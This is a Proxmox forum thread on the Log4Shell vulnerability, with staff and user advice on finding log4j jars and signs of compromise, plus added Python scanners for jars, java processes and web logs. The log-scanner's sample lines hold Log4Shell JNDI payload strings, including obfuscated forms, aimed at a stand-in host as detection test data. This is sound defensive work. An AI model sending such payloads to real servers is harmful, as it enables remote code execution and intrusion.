log4j exploit - what to do??

aaron (Proxmox Staff Member, joined Jun 3, 2019)
> So my question is, does Proxmox also use this package?
There is no Java used on the Proxmox VE side of things.
Proxmox VE is mostly written in Perl, with some daemons in C and Rust. The same goes for the Mail Gateway. The Proxmox Backup Server is written primarily in Rust.

Since our products are all open source, feel free to check out the source code at https://git.proxmox.com/

This is of course only valid for a standard installation. If you did install some 3rd party software that is using Java, you might be affected. A first step to figure that out would be to check for any java processes running. I think
Code:
ps auxwf | grep java
should do the trick.
Edit: Though that would also give results if you have some java running inside a container. Check who the owner is.
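The caveat in the post above (a `ps` on the host also lists java processes that live inside containers) can be resolved by reading each process's cgroup instead of guessing from the owner. The following is an added example, not code from the post or from Proxmox: it lists java processes on a Proxmox VE host and reports which LXC container each one belongs to. It assumes the cgroup path layout PVE uses for containers, where a containerized process carries a path component of the form `lxc/<VMID>`.

```python
"""Added example (not from the Proxmox forum post or the Proxmox code base):
list running java processes and attribute each one to the LXC container it
runs in, by reading /proc/<pid>/cgroup. Assumption: processes inside a PVE
container carry a cgroup path containing 'lxc/<VMID>' (cgroup v1 or v2)."""
import os
import re

_LXC_RE = re.compile(r"(?:^|/)lxc/(\d+)(?:/|$)")


def container_of(cgroup_text: str) -> str:
    """Return the LXC container ID named in a /proc/<pid>/cgroup dump,
    or 'host' when no lxc/<id> path component is present."""
    for line in cgroup_text.splitlines():
        # Each line is  hierarchy-ID:controllers:path  (v1)  or  0::path  (v2)
        path = line.rsplit(":", 1)[-1]
        m = _LXC_RE.search(path)
        if m:
            return m.group(1)
    return "host"


def is_java_process(cmdline: bytes) -> bool:
    """True if argv[0] of a NUL-separated /proc/<pid>/cmdline dump is java."""
    argv0 = cmdline.split(b"\0", 1)[0]
    return os.path.basename(argv0) in (b"java", b"javaw")


def find_java_processes(proc_root: str = "/proc"):
    """Yield (pid, owner uid, container-or-'host') for every java process."""
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(f"{proc_root}/{pid}/cmdline", "rb") as f:
                cmdline = f.read()
            with open(f"{proc_root}/{pid}/cgroup") as f:
                cgroup = f.read()
            uid = os.stat(f"{proc_root}/{pid}").st_uid
        except (FileNotFoundError, ProcessLookupError, PermissionError):
            continue  # process exited between listdir and open, or not readable
        if is_java_process(cmdline):
            yield int(pid), uid, container_of(cgroup)


if __name__ == "__main__":
    # Run as root on the PVE host; 'host' means the process is not in a container.
    for pid, uid, where in find_java_processes():
        print(f"pid={pid} uid={uid} container={where}")
```

A process reported as `container=106` is the container's problem to patch (enter it with `pct enter 106` and update there); only `container=host` entries indicate Java installed directly on the hypervisor.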

binaryanomaly (Member, joined May 11, 2018)
Great, thanks for the swift response @aaron

XenForo might be impacted though:
https://xenforo.com/community/threa...h-and-more-via-apache-log4j-log4shell.201145/

crally (New Member, joined Aug 9, 2020)
Hi,

there is a good command to check whether your machines are affected:

Code:
sudo find / -name 'log4j-core-*.jar'

Sometimes the lib is packed into a *.jar file. To check for this you can use:

Code:
sudo find / -name '*.jar' -exec sh -c 'if zipinfo "$1" | grep -q JndiLookup.class; then echo "$1"; fi' sh {} \; 2>/dev/null


Put the commands into the Proxmox shell. This will check your containers, too. For the virtual machines you need to put the commands into their shells.
As you can see, my UniFi controller (CT 106) was affected. A simple apt update && apt upgrade did the trick for this. It's now at version 2.15.

Attachment: Unbenannt.PNG (screenshot of the find output, 14.7 KB)
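The two `find` commands above catch a loose `log4j-core-*.jar` and a jar that contains `JndiLookup.class` directly, but not a log4j-core copy bundled inside another archive (a Spring Boot fat jar, a `.war`, or an `.ear` with jars under `WEB-INF/lib` or `BOOT-INF/lib`). The following is an added example, not code from the post: it walks a directory tree, opens every archive, descends into nested archives, and reports the log4j-core version from the bundled `pom.properties` so the reported number can be compared against the version the application was upgraded to. The `build_sample_jar` helper constructs a fixture for testing only.

```python
"""Added example (not from the forum post): find log4j-core, including copies
nested inside other jar/war/ear archives, and report the bundled version."""
import io
import os
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(data: bytes):
    """Extract 'version=...' from a Maven pom.properties file."""
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(blob: bytes, label: str):
    """Return [(label, version-or-None), ...] for one archive, descending into
    nested archives. label is the outer path plus inner entry names joined by '!/'."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return findings  # not a zip container (e.g. a renamed text file)
    with zf:
        names = zf.namelist()
        if JNDI_CLASS in names:
            version = _version_from_pom(zf.read(POM_PROPS)) if POM_PROPS in names else None
            findings.append((label, version))
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(scan_archive(zf.read(name), f"{label}!/{name}"))
    return findings


def scan_tree(root: str):
    """Scan every archive under root (run as root on the host to cover CT rootfs)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, "rb") as f:
                        findings.extend(scan_archive(f.read(), path))
                except OSError:
                    continue  # unreadable or vanished; skip rather than abort
    return findings


def build_sample_jar(version: str, nested: bool = False) -> bytes:
    """Constructed test fixture (not a real log4j build): a minimal jar with the
    JndiLookup.class entry and a pom.properties, optionally wrapped in an outer
    application jar the way Spring Boot packages its dependencies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        zf.writestr(POM_PROPS, f"version={version}\n")
    inner = buf.getvalue()
    if not nested:
        return inner
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("BOOT-INF/lib/log4j-core.jar", inner)
    return outer.getvalue()


if __name__ == "__main__":
    import sys
    for label, version in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{label}: log4j-core {version or 'unknown version'}")
```

Run it against `/` on the host to cover container root filesystems too; for VMs it has to run inside the guest, as with the shell commands above.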

mahofst (New Member, joined Nov 26, 2021)
Where would I check for possible attacks (on CTs/VMs)?
Is there some default log active that I could check, and what would I look out for?

(I really don't think what I administrate was attacked, since it is inside a VPN and only neo4j uses log4j, but I'm curious.)

crally (New Member, joined Aug 9, 2020)
I think that would be difficult. You could search all log files for the attacker's command (don't know if I am allowed to post it). But since it could be that the attacker deleted the log entries, you cannot be sure whether your system is injected with something....
But maybe someone else has an idea.

oguz (Proxmox Staff Member, joined Nov 19, 2018)
> Where would I check for possible attacks (on CTs /VMs) ?
> Is there some default log active, that I would check, and what would I look out for?
in your web logs mainly. most exploit attempts are sending HTTP requests with the malicious payload inside some header (User-Agent is common, along with some other ones).

if you search online you can find fail2ban filter rules ;) [0]

just look out for common signs of compromise if you have doubts:
* new users on the system
* unfamiliar processes taking a lot of resources
* weird cron jobs
* missing/deleted logs
and the regular stuff.

although if you're not using any java you shouldn't have to worry about it :)

from our stack there's nothing we use java with, so default installations are safe as mentioned before...

[0]: https://github.com/atnetws/fail2ban-log4j/blob/main/apache-jndi.conf
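The advice above is to look in the web logs for the lookup payload in request headers. A literal search for the payload string misses the common nested-lookup spellings that the linked fail2ban filter also has to account for, so a detector should normalize those first. The following is an added example, not code from the post or from the fail2ban rule: it collapses single-character nested lookups and then matches the JNDI lookup prefix over constructed Apache-style access log lines. The sample lines, hostnames and timestamps are all made up for the test.

```python
"""Added example (not from the forum post): flag log4j JNDI lookup attempts in
web access logs, handling the nested-lookup obfuscation a plain substring
match on '${jndi:' misses."""
import re

# ${lower:j}, ${upper:N}, ${::-d} and ${env:UNSET:-i} each evaluate to one character
_INNER = re.compile(r"\$\{(?:lower|upper):([^}])\}|\$\{[^{}]*:-([^}])\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly collapse single-character nested lookups, innermost first."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line, after normalization, carries a JNDI lookup prefix."""
    return _JNDI.search(normalize(line)) is not None


def scan_log(lines):
    """Return the subset of lines that look like lookup attempts."""
    return [line for line in lines if is_log4shell_probe(line)]


# Constructed sample lines (combined log format); none are real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://scanner.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://scanner.example/c}"',
    '10.0.0.7 - - [11/Dec/2021:10:02:00 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in scan_log(source):
        print(hit.rstrip())
```

A hit only proves a probe reached the web server, not that anything was exploited; the follow-up is the host-level checks listed above (new users, unfamiliar processes, cron jobs, missing logs) on whatever Java service sits behind that endpoint.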
